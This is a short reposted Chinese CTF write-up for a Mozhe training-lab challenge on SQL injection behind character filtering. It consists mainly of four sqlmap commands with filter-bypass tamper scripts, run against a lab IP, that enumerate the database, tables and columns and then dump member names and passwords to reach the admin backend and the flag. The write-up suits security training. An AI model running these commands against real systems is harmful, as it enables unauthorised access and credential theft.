SQL過濾字符后手工注入漏洞測試(第1題)

本文轉載自查看原文 2019-04-23 11:19 546 SQLmap/ Penetration Testing

https://www.mozhe.cn/bug/detail/a1diUUZsa3ByMkgrZnpjcWZOYVEyUT09bW96aGUmozhe

分析題目，屬於時間盲注，這種情況，通常使用sqlmap 直接注入就行了，手動語法太復雜了！！！

sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment --current-db

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns

╰─ sqlmap -u "http://219.153.49.228:49703/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password,status --dump

登錄后台，獲取flag，提交即可

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 SQL注入——Union注入攻擊——手工注入篇——SQL手工注入漏洞測試(MySQL數據庫) SQL注入語句-手工測試 SQL注入之手工注入 SQL手工注入基礎篇 SQL手工注入學習一 [總結]SQL手工注入總結搜索型注入漏洞手工注入過程 SQL注入之PHP-MySQL實現手工注入-字符型最新SQL手工注入語句&SQL注入大全基礎篇——SQL注入（手工注入）